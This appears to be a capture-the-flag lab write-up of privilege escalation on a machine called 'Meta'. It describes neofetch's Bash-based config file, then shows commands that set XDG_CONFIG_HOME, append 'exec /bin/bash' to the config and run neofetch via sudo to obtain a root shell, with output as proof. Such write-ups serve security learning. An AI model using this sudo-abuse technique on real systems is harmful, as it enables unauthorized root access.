InfoSec LAB

Meta_Privilege_Escalation

Created: 3 min read

neofetch

neofetch is a system information tool written in the bash shell scripting language. On the left side is always a logo of the distribution, rendered in ASCII art. Unlike a system monitor, the tool only features a static display of the computer’s basic hardware and software configurations and their versions, typically operating system, the host (namely the technical name of the machine), uptime, package managers, the shell, display resolution, desktop environment, window manager, themes and icons, the computer terminal, CPU, GPU, and RAM. Neofetch can also display images on the terminal with w3m-img in place of the ASCII logo art.

  • neofetch makes use of a configuration file called config.conf by default, which is located in the $HOME/.config/neofetch/ directory. This file contains various options and settings that control the behavior and appearance of neofetch.

  • The config.conf file allows users to customize the output of neofetch by changing the values of various options such as the ASCII art, the color scheme, the system information to display, and many others. Users can modify the config.conf file using a text editor or by using the neofetch --config command to open the configuration file in their default editor.

  • It’s worth noting that neofetch also supports various command-line options that allow users to override the settings in the config.conf file and customize the output of neofetch on the fly.

  • The configuration file also supports custom commands to the config.conf file as it is just a Bash script

Exploitation

I would first need to check the value of the XDG_CONFIG_HOME environment variable I need to make sure that the environment variable is set and pointed to the right direction where the config file is located

thomas@meta:~$ echo $XDG_CONFIG_HOME

The XDG_CONFIG_HOME environment variable is not defined at all Without defining the environment variable above, neofetch wouldn’t know where to look for the config file, resulting the default operation

However, I can just set it up

thomas@meta:~$ export XDG_CONFIG_HOME=/home/thomas/.config
thomas@meta:~$ echo $XDG_CONFIG_HOME
/home/thomas/.config

The XDG_CONFIG_HOME option should now be working and preserved for the sudo-privileged command

thomas@meta:~$ echo 'exec /bin/bash' >> ~/.config/neofetch/config.conf

Since it’s all just Bash, I can just use Bash exec function to spawn another Bash shell

thomas@meta:~$ sudo -u root /usr/bin/neofetch 
root@meta:/home/thomas#
root@meta:/home/thomas# whoami
root
root@meta:/home/thomas# hostname
meta
root@meta:/home/thomas# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.11.140  netmask 255.255.254.0  broadcast 10.10.11.255
        ether 00:50:56:b9:20:93  txqueuelen 1000  (Ethernet)
        RX packets 3391534  bytes 668444571 (637.4 MiB)
        RX errors 0  dropped 87  overruns 0  frame 0
        TX packets 3398228  bytes 1262226964 (1.1 GiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 11141  bytes 856516 (836.4 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 11141  bytes 856516 (836.4 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

System Level Compromise

Interactive Graph View

Backlinks